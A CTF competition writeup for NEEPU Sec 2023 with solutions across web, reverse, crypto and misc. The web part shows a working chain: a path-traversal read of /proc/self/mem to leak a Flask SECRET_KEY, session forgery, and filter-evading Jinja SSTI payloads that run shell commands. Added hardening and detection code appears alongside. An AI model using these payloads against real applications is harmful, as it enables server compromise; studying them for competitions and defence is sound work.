NEEPU Sec 2023 Open Competition writeup

Web

Cute Cirno

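My skills aren't up to this and my head is about to explode.

The page source of the Cirno page reveals an arbitrary file read.

I had seen an arbitrary file read in an earlier competition, and that challenge was about SECRET_KEY.

Here I tried to make it throw an error, so I requested http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/mem

Read CuteCirno.py and save it: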

from flask import Flask, request, session, render_template, render_template_string
import os, base64
from NeepuFile import neepu_files

CuteCirno = Flask(__name__,
                  static_url_path='/static',
                  static_folder='static'
                  )

CuteCirno.config['SECRET_KEY'] = str(base64.b64encode(os.urandom(30)).decode()) + "*NeepuCTF*"

@CuteCirno.route('/')
def welcome():
    session['admin'] = 0
    return render_template('welcome.html')


@CuteCirno.route('/Cirno')
def show():
    return render_template('CleverCirno.html')


@CuteCirno.route('/r3aDF1le')
def file_read():
    filename = "static/text/" + request.args.get('filename', 'comment.txt')
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    return neepu_files(filename, start, end)


@CuteCirno.route('/genius')
def calculate():
    if session.get('admin') == 1:
        print(session.get('admin'))
        answer = request.args.get('answer')
        if answer is not None:
            blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
                         'posix', 'builtins', 'namespace','open', 'read', '\\', 'self', 'mro', 'base',
                         'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
                         'include','request', '{{', '}}', '"', 'config','=']
            for i in blacklist:
                if i in answer:
                    answer = "⑨" +"""</br><img src="static/woshibaka.jpg" width="300" height="300" alt="Cirno">"""
                    break
            if answer == '':
                return "你能告诉聪明的⑨, 1+1的answer吗"
            return render_template_string("1+1={}".format(answer))
        else:
            return render_template('mathclass.html')

    else:
        session['admin'] = 0
        return "你真的是我的马斯塔吗?"


if __name__ == '__main__':
    CuteCirno.run('0.0.0.0', 5000, debug=True)

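You can see that SECRET_KEY is used here as well.

I found a writeup for the file-session challenge from the Blue Hat Cup (蓝帽杯) preliminary round:

https://erroratao.github.io/2022/07/10/File_Session/#%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9B-file-session-%E8%A7%81%E8%A7%A3

Then look at view-source:http://neepusec.fun:28723/r3aDF1le?filename=../../../../app/NeepuFile.py

It computes end - start itself.

So I slightly modified the script mentioned in that challenge: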

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re

import requests

# List the memory mappings of the Flask process through the file-read route
url_1 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/maps"
res = requests.get(url_1)
maplist = res.text.split("\n")

for i in maplist:
    # SECRET_KEY is generated at start-up, so it only lives in readable and writable regions
    m = re.match(r"([0-9A-Fa-f]+)-([0-9A-Fa-f]+) rw", i)
    if m is not None:
        start = int(m.group(1), 16)
        end = int(m.group(2), 16)
        url_2 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/mem&start={}&end={}".format(
            start, end)
        res_1 = requests.get(url_2)
        # The key always ends with this fixed suffix (see CuteCirno.py)
        if "*NeepuCTF*" in res_1.text:
            print(start)
            print(end)
            print(url_2)

One of the regions contains kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*
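On the defensive side, the r3aDF1le route is readable this way because it concatenates the filename parameter onto static/text/ without checking where the result points. The following is an added example, not code from the challenge or from the original post, showing that resolution next to a contained one; `read_slice`, `MAX_LEN` and treating end=0 as "to end of file" are assumptions, since the body of neepu_files is not reproduced on this page.

```python
import os
import posixpath
import tempfile

MAX_LEN = 64 * 1024  # assumed cap on bytes returned per request


def resolve_vulnerable(base_dir, filename):
    """Mirror of the route on the page: plain string concatenation."""
    # normpath only makes visible where the "../" hops end up.
    return posixpath.normpath(base_dir + "/" + filename)


def resolve_hardened(base_dir, filename):
    """Return the real path of filename only if it stays inside base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses "../" and follows symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes " + base)
    if not os.path.isfile(candidate):
        raise FileNotFoundError(filename)
    return candidate


def read_slice(base_dir, filename, start="0", end="0"):
    """Hypothetical replacement for neepu_files(): bounded read inside base_dir."""
    path = resolve_hardened(base_dir, filename)
    start, end = int(start), int(end)  # ValueError on non-numeric input
    size = os.path.getsize(path)
    if end == 0:  # assumption: end=0 means "to end of file"
        end = size
    if not 0 <= start <= end <= size:
        raise ValueError("range outside file")
    with open(path, "rb") as fh:
        fh.seek(start)
        return fh.read(min(end - start, MAX_LEN))


def demo():
    """Build a throwaway static/text tree (constructed data) and try three requests."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "static", "text")
    os.makedirs(base)
    with open(os.path.join(base, "comment.txt"), "wb") as fh:
        fh.write(b"hello cirno")
    results = {"ok": read_slice(base, "comment.txt", "0", "5")}
    for name in ("../../../../../proc/self/maps", "/proc/self/mem"):
        try:
            read_slice(base, name, "0", "16")
            results[name] = "served"
        except PermissionError:
            results[name] = "blocked"
    return results


if __name__ == "__main__":
    print(resolve_vulnerable("/app/static/text", "../../../../../proc/self/maps"))
    print(demo())
```
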

import base64
from flask import *
import pickle


SECRET_KEY = "kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*"
app = Flask(__name__)
app.config.update(dict(
    SECRET_KEY=SECRET_KEY,
))


@app.route("/", methods=['GET', 'POST'])
def login():
    session['admin'] = 1
    return 'mu'


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=11451)

This gives the admin session: eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g
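A Flask session cookie is signed, not encrypted, which is why a leaked SECRET_KEY is all that protects the admin flag. The following is an added example, not part of the original post: it decodes the cookie quoted above and re-implements, with the standard library only, the itsdangerous scheme Flask uses by default (HMAC-SHA1 with the salt cookie-session) so that a cookie can be checked against a key.

```python
import base64
import hashlib
import hmac
import json

PAGE_COOKIE = "eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g"  # cookie quoted in the writeup


def b64d(text):
    """URL-safe base64 decode with the stripped padding restored."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def b64e(raw):
    """URL-safe base64 encode without padding, as used in the cookie."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def parse_cookie(cookie):
    """Split payload.timestamp.signature and decode the parts anyone can read."""
    payload, timestamp, signature = cookie.rsplit(".", 2)
    if payload.startswith("."):
        raise ValueError("zlib-compressed payloads are not handled here")
    return {
        "data": json.loads(b64d(payload)),
        # Seconds since the Unix epoch in current itsdangerous releases.
        "timestamp": int.from_bytes(b64d(timestamp), "big"),
        "signature": signature,
    }


def expected_signature(secret_key, signed_part, salt=b"cookie-session"):
    """HMAC-SHA1 over 'payload.timestamp' with a key derived from SECRET_KEY."""
    derived = hmac.new(secret_key.encode(), salt, hashlib.sha1).digest()
    mac = hmac.new(derived, signed_part.encode(), hashlib.sha1).digest()
    return b64e(mac)


def verify(cookie, secret_key):
    """True only if the signature matches what secret_key would produce."""
    signed_part, signature = cookie.rsplit(".", 1)
    return hmac.compare_digest(signature, expected_signature(secret_key, signed_part))


if __name__ == "__main__":
    print(parse_cookie(PAGE_COOKIE))
    print(verify(PAGE_COOKIE, "some-other-key"))
```

Because the payload is readable and the signature depends only on SECRET_KEY, any disclosure of that key (here through the file read) calls for rotating it and treating every outstanding session as untrusted.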

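Request genius with that session attached.

SSTI

For reference, see SSTI challenge no. 369 on ctfshow and a challenge from a network security platform test competition.

Here {%print((lipsum|lower|list))%} is used to list the available characters: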

['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '2', 'c', '6', '4', 'b', 'f', '1', '8', '2', '0', '>']

A script then builds __globals__, __getitem__, os, popen and read from these characters.

Because pop is filtered, values are fetched by array indexing instead.

However, in this reproduction there is no character d. When I originally solved it, lipsum happened to contain one (sob), so read cannot be built this way; instead take it from (lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)

It is found at (lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]

The above ran ls; now look at ls /:

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

There is a readflag and a flag. readflag probably has to be executed, but first try reading flag (cat /flag):

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[4]~(lipsum|lower|list)[15]~(lipsum|lower|list)[5]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

The result is empty, so /readflag must be what has to be executed:

http://neepusec.fun:28692/genius?answer={%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

All this character substitution wore me out. On to Revenge.
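The blacklist in calculate() never blocks `{%`, so a statement tag built from indexed characters passes every check. The following is an added example, not code from the challenge or the original post: it runs the page's blacklist over the probe used above, shows an allowlist for the numeric answer the route actually expects, and flags Jinja delimiters in constructed access-log lines; `is_valid_answer`, `flag_requests` and the log format are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Blacklist copied from calculate() in CuteCirno.py
BLACKLIST = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
             'posix', 'builtins', 'namespace', 'open', 'read', '\\', 'self', 'mro', 'base',
             'global', 'init', '/', '00', 'chr', 'value', 'get', "url", 'pop', 'import',
             'include', 'request', '{{', '}}', '"', 'config', '=']

JINJA_DELIMS = ("{{", "{%", "{#")          # expression, statement and comment openers
ANSWER_RE = re.compile(r"-?[0-9]{1,9}")    # assumed: the answer to 1+1 is a short integer

PROBE = "{%print((lipsum|lower|list))%}"   # probe quoted in the writeup

# Constructed log lines in common log format (addresses from the documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/May/2023:06:40:01 +0000] "GET /genius?answer=2 HTTP/1.1" 200 5',
    '203.0.113.7 - - [20/May/2023:06:41:13 +0000] '
    '"GET /genius?answer=%7B%25print((lipsum%7Clower%7Clist))%25%7D HTTP/1.1" 200 310',
]


def first_blocked_token(answer):
    """Return the blacklist entry that would reject answer, or None if it passes."""
    for token in BLACKLIST:
        if token in answer:
            return token
    return None


def is_valid_answer(answer):
    """Allowlist: accept only what the feature needs instead of listing bad strings."""
    return ANSWER_RE.fullmatch(answer) is not None


def flag_requests(log_lines):
    """Return decoded answer values that contain any Jinja opening delimiter."""
    hits = []
    for line in log_lines:
        match = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query).get("answer", []):
            if any(delim in value for delim in JINJA_DELIMS):
                hits.append(value)
    return hits


if __name__ == "__main__":
    print(first_blocked_token("{{7*7}}"), first_blocked_token(PROBE))
    print(is_valid_answer("2"), is_valid_answer(PROBE))
    print(flag_requests(SAMPLE_LOG))
```

Validation narrows the input, but the root fix is to stop formatting the value into the template source and pass it as a context variable instead, for example render_template_string("1+1={{ answer }}", answer=answer).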

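Cute Cirno (Revenge)

The steps are the same as above.

proc/self/cmdline shows that the script being run is named CuteCirnoRev.py.

http://neepusec.fun:28698/r3ADF11e?filename=../../../../../app/CuteCirnoRev.py

Everything else is unchanged, and the payload is the same.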

Rev

How to use ida?

Just open it in IDA.

Base

Look at encode_1 and encode_2.

encode_1: rot with an offset of 3

encode_2: base64

welcometotheworldofctf

Neepu{welcometotheworldofctf}

How to use python?


import string
from tqdm import tqdm

table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                s = i+j+k+h
                if(sum(ord(x) * 10000 ** i for i, x in enumerate(s[::-1])) ==110009500490115):
                    print(s)

import hashlib
import string
from tqdm import tqdm

table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                flag = f'Neepu{{Pyth0n_1s_a_t{i}{j}l_{k}1{h}ku}}'.encode()
                m = hashlib.sha256(flag).hexdigest()
                if(m == 'a04f00829f27a5ead1c4ae526d6b1b0cec30ed0e56d6d71e9c001d7803e84892'):
                    print(flag)#Neepu{Pyth0n_1s_a_t00l_y1_ku}

IKUN Checker

Open it in dnSpy.

Look at each part in turn.

A somd5 lookup gives 1998-8-2.

A somd5 lookup gives jinitaimei.

Join them with a - in between.

Decrypt the AES.

Finally, enter the result.

The flag is the SHA-256 of the input, i.e. Neepu{b8688fc33b5786095dc70a34ad14b9623905185663fa26dcc75d3b6b1f69999e}

junk code

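Junk instructions have been added. When run normally the program does print a second character, so I guessed there is a sleep. The junk instructions are there, but they don't affect this.

NOP it out.

Save and run.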

Neepu{it-1s-not-junk-code-1u-1u-the-qq-bin-mat}

Crypto

FunnyRsa

Seeing e=3, I went straight to the template script:

import gmpy2
import binascii

e = 3
n = 508480854372756755913791101745305762457517298159680989644747340327036977578527505318324958633232739687251409520866901608437945927574543155971443209922394847753303798988837755432365056098925797113097436966052676591464802061455795339989784949253878654243424430112737855583276666468348152646780267313723933052043652043457805179867064143032058107197027709609118240936819964179830722897401341043667501298533160902654255596452348828855631402136248161345374217307571507612687845128249648000080509946611349654016724007920186542131491886281036913471846314065665956824568534254734060468248256266109011728508043378818494008953002180704766570040343479609214117050941617109009620565019399761765253703071237034374358239723604390448411521487409469419576049566386525066685041905464761757345225778527338430347014422459954532168552493706796761693553297732745470452288495224654530482329002451540376107539184656257369225752541361996356642232449580990809290287044068126307915255465596308681516279323181254599943979030260297865604529605690218915679197797309258313924963034175283390070634287196300753230812822254122160704736109171545494720552113142650620106205647711854004731168393093254452512276389945341818288720153371447538338764655583233355044033698253
c = 1811190934126864017324358781557112607374925418749516169609783406151778537247582927245777048528376193187995730195136886128337489858508361912939739791856453029029472008503849636323475596821894021085406391087644300429282015652303512547583242875798709634440100351468653278854842376234162516591017755925768811542318681182791159664625408669418924102547889582147686273287037619637618739708338600060067635958832146122636281342410738805977631878905617340110767089538025585058506632889042141695774769826454213414615721715636679099281147824773004445559938086334729812819928608583224897377

i = 0
while True:
    if gmpy2.iroot((c+i*n),3)[1] == True:  # gmpy2.iroot(x, n) takes the integer n-th root of x
        m = gmpy2.iroot((c+i*n),3)[0]
        break
    i += 1

print(binascii.unhexlify(hex(m)[2:]))
#b'Dear OOD PERSON,\n\nNeepu{1nterest1ng_D0_y0u_kn0w?}Welcom to NeepuCTF!G00d luck!!!'

Loss

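The challenge doesn't feel like it has much to do with crypto, so treat it as misc.

hex(k)[2:] is used without zfill. Looking at the values, ct is 2 characters short and key is 3 characters short, so I wrote a script to brute-force it: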

from Crypto.Cipher import AES
from tqdm import tqdm

def DecryAES(ct,key):
    ct,key = bytes.fromhex(ct),bytes.fromhex(key)
    aes = AES.new(key,AES.MODE_ECB)
    m = aes.decrypt(ct)
    return m

ct  = '98691cbec88e449e8bac58e91142269a7da5efa9e7c62848e7135f1150f02a'
key = '8ee2b28564433679d93b82873fe8a'
ct_arr = []
key_arr = []
for i in range(len(ct)+1):
    for j in range(i,len(ct)+1):
        mod_ct = ct[:i] + '0' + ct[i:j] + '0' + ct[j:]
        ct_arr.append(mod_ct)
for i in range(len(key)+1):
    for j in range(i,len(key)+1):
        for k in range(j,len(key)+1):
            mod_key = key[:i] + '0' + key[i:j] + '0' + key[j:k] + '0' + key[k:]
            key_arr.append(mod_key)
for ct2 in tqdm(ct_arr):
    for key2 in key_arr:
        m = DecryAES(ct2,key2)
        if(b'Neepu' in m):
            print(m)

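loud

The same as the leak in d3noisy from the earlier d3.

The official script:

Modify it a little (in practice I spent a long time on this challenge; it was not as simple as this writeup makes it look):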

from sage.all import *
from sympy import nextprime
from Crypto.Util.number import inverse  # modular inverse used for the CRT coefficients below

p=[66467878562792562224887473415011035371976498729276781135103070806273826602147, 87779827664444719705378632508432527366151596527264599732383282214161710342059, 106478845076259796180788022071614290976203859464583466743581048528447954519879, 96059795988661207615203630115134173796188205316583242342092930969746956840537, 76648433583138097341785050433545276046328401071616329410459071963649387342037, 75363807436621723536569872393312030066473340867618075065014040776064056013377, 84549506983821330145587582824091845683589581353932033068622843538281197238321, 111370876180722361599897961586244954018438484624454058266043059162224754345369, 64482965162169334114246637526347201196498007629645251181883638859700004974179, 115737745133463165088409210929201564518908251675851193212090312153202710950611, 65430568356698229457733164116539029669340192339524852345167889932007830803713, 83005759669335703543538842561745612525242745913149020160169673469294684269349, 86695300569990829413494539259312051326564517598709183416846805385774886176327, 87649503475806433108642579024197030978459906709386640769733298397489631575119, 67546279258240068058305769281370224151667980031696762855998467222703960646549, 109277222890519331704406685175081474974918071159722270158398833428598261621993, 94947541482876422720663520475916415155713415168744242709306335577278248129671, 72169704519430039945520319412623531417839608722431394881643470024106954771823, 67960163975784724339119270210646072354375119081204577840800359343098463410911, 99600976311231076437603674530239237427983536499904250636338541144596856152681]
S=[[36006797306819385066479875554093947690583427970449583820207929310836800884907, 42421831928852572111305575764455253114855197661030346257979092292334693704638, 12802758082612276306666301210467012086210333405770973816248015272325645518737, 35891119003347284519077367147618128608424314149438118637710340094202006973607], [69221811235046204007409195125183399115207721139473251108686359647136964539528, 68728546052531932227774742525240050245981893208569278338806756195046394386320, 77378932313251132635143406501260917558950175409375255430759788116685665756853, 52610629088183684552705334542273079173241031671071904128690224212767984326814], [84632180774187758644772651231005808936754972376616591239738706882585325508504, 22245885241129428291065279034982203110690225047634487933389806520943556010139, 65058154300579433325392929157176043693547112910255708084394089838078169979653, 26450521689799343844879689401496427283279097300795496218417820952255310453381], [31743210200723432871171527300926464156713378567872351797727553809801223755669, 13585899089974057026763852048073375117825112528263695778864069316682632842469, 61718974141826995988697061776372539645461814294568567001726256109104825647174, 51180314603392071189287058511013567287870020999513958065031674007822278281592], [54972437884087220348657249916515696089000557932808046438758622081654015388431, 60595394189514447466338506137494568375465810079275014516953880523799578017650, 48290106501584587524538351792623115913538457076946109833703750186838567097829, 75809640108047877199495621711957016420204838905577105767711805228492185803198], [2043782039074334576524460230918369530353673853539675192552828729137718721899, 49835004172676327317136633790276532689791891581739516605994211773520862094089, 74150446127124215081973853925119891529594162176613983713739514646864857274598, 3870903633214309884568064156029910145031131868082685800718700340446754642668], [58530922734504496400650172153260509666806593206632885245359170202099163777029, 
24679955301703325026039585637067957593890919790442322117013190013849632870045, 47461847478301275711387089619360312020232490159064156700718722079533108310495, 78436661760605062831488783213279281637896003485976271847409520316669048162591], [3960169205004685923298734670827529710258905436583484891133449600679523626998, 56971763036590510871648632641525055519742294555040115044720432874482626152527, 7500941845513450196840656641552395008944195976110947855355515297144549893577, 104364444158131675753431216431697712763613996035708348677723420914206545999308], [21090310989423433113256120275297260716078136824734467530250689161392790805917, 59095240674034520085214866457855433129352762312493710903594522366480317145097, 25950268632849909273587896220763105221984980662119437334003683923010964181793, 22214910913289817220594820237750728594412035322558117144502181839908519483813], [6516207309607110723013310828779534786605721487724433166085213573594060054191, 62491095915002854769743893168840271080994195414466604510886959458801333994425, 43298696119722427147738220942971604096101207270771677319478440633957185506012, 95999300849358990419162309412086189707629278626118528491801630061635930409174], [21901937371736027133484836626793049950863305103635439434565692334061323247459, 22177707944556298482781825594816606678702151909926553218938857302296851101061, 37265517992688571580384548897674161792052985496826940853296718063969030761085, 45803015810935362104176472501216732994877801735307247883040947086374864784522], [22887302429552282917137975404437379689230279867683032429064655381687354309967, 63687512791087585071097169701758075850922324857489524802811455099431146712006, 43241233600118761031756067392063544631958472413548145463886944168747993611755, 78540416079875697330277927812643707908744419489483603613867805715379418188382], [83274701456245595041914535781657541250722792681868330743604458671030342631093, 29265221035131869074958665850197081103720257562467498607821734305785454256445, 
19656036104607964818483236621454584533830854692521644548949580232419092579485, 36685991496747026794589417986750583003976651961717444764360736602328859939203], [7197271849934394038490337096465830651019854061628854994110403632096530818658, 13199583400545916173897024693988359528617080325104182927755868559199746329580, 76705903744610047925943025263768006533642196751938988456317343613219129386367, 8284847848213860404087592474405055922947517109038702885136704630947806019241], [40192513898904947184731216279798716826510915071804534174239538082671192078053, 756883344718645808681598066443462390307116757281839378450937721653214302485, 46319296839244788373603804279624137323125709215284595152627739510983625831713, 38066834404440733412548216101182968084184940639461830700714702917736840764910], [52459924240743004858678271074727889512634425322058383892565820049302166247484, 1124830903052334805081369416754962375712146318972731973481260141314675294280, 7048586820754100983732909765398789018269542052380424872274364753361851089050, 46261533803791211860667474793341333491934930635468558951890405299902112599717], [23712997405587065505471765580307890926020635436932008780552027395793174460196, 67696894015776789806885369424535665938702806354704500197616129889160343225036, 22335907790107175161378264382954791596027764567679319454957440806458200559861, 76817272441881586284817699756225532359147752598882508352406898668675942956599], [48442733699161048528383543478196401606393182356208996862954079146924798030016, 33988046942702399144226829264100378601075005547176282333019034404108127701223, 3878811651113775226499837109875057444157158981192358109242560352485567236840, 48096508435450140842190594378561970076075899550630622502080370324305787016204], [4661700708549906139665791533582485338344505441635713456342199101346895847315, 57085434497175712126874334119472545667616658739402471396702109228089918012639, 43291903057149273908186130451801222008858189682043034712173498638683726314620, 
43681777323686685006867808938443372833327865869793588659920726812432020143637], [34817244237217626483621974571192315048341502556634007719371004295715069335162, 10855671893795758052388714204250213675262352053079039688785650172729770783108, 55808546957704772545340135312880985328286637622927964296444521648705445287337, 57996505385421171401445757882512186395065784033051493647151141293523405436642]]

n = 20
m = 4
B = 2**4096
P = 1
for i in range(n):
    P *= p[i]
L = []
for i in range(n):
    t = inverse(P//p[i],p[i])
    L.append(t*(P//p[i]))

BB = matrix(n*m+1)
BB[0,0] = P
for i in range(n):
    for j in range(m):
        t = i*m + j
        BB[t+1,t+1] = B
        BB[t+1,0] = S[i][j] * L[i]
red = BB.LLL()
f = open(r'C:\Users\mumuzi\Desktop\outs.txt','w').write(str(red))

Opening the output, only the first row is a single positive number followed by a pile of zeros; all the other rows contain negative numbers. Here only the flag has a value, whereas in the original challenge N also had 15 values, so the first row is the one that meets the requirement.

So I tried submitting 116926347417973739813389504748758673981034015364501761586986653891072159614466535442285940993424509487983408826535446174908960805420415826892247095629899711028817120829492104752602407109216917926271092220486968841156519990362949657487794025464819714162899699678997721569868660164545620667051526447422139521078040002214106645807945132338049458476984219774549279366132880281262873259579336469061431142093875314095384936916552701093157363813120451972804242781688459725262869243990446191731213239849534613643610956337393952997289528155686740057414072272137510704615005549047461973455194160253722511339247030805640858589842699243553893990352636820643317189483800653004195589918829455999679822736492945367960846445909281065494949166307806389546596789298753332846823642742703456348160285521746213654908420577340508033880925137019362574079782798769495078307996462897694930462678432564135136546708085518325059843563577692800896695337469509988693835802560372443455806502280391274164995314797779082864525968072787575692490640928881743177623466702363671996974454074849781021299229369520112211636727082759319836173414882071943165226884042463530718394000680023200019847602023738930464764671560604546094707989602894519207930387266023700987775382170, and it was accepted.

Misc

First Stop in Jilin

Google image search and Baidu image recognition.

For the first image, text could not be added on the computer, so I used a phone.

Neepu{zhuqueshan_songhuahu_dongbeidianlidaxue}

Reflection

There is a reversed PNG at the end of the file. Split it out manually and then reverse it:

f = open('reflection2.png','rb').read()
fw = open('re.png','wb').write(f[::-1])

The two images turn out to be the same, but XORing them directly in stegsolve shows blue lines, so the obvious thing to consider is a blind watermark.

Neepu{THe_S3cR3t_UNd3r_t4e_R3fl3Ct10n}

Shiro

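A packet capture is provided. It shows five very large POSTs; decoding the cmd of each one, there is one that reads a docx as base64 and another that reads id_ssh.

The parameter that follows neepu is a class file.

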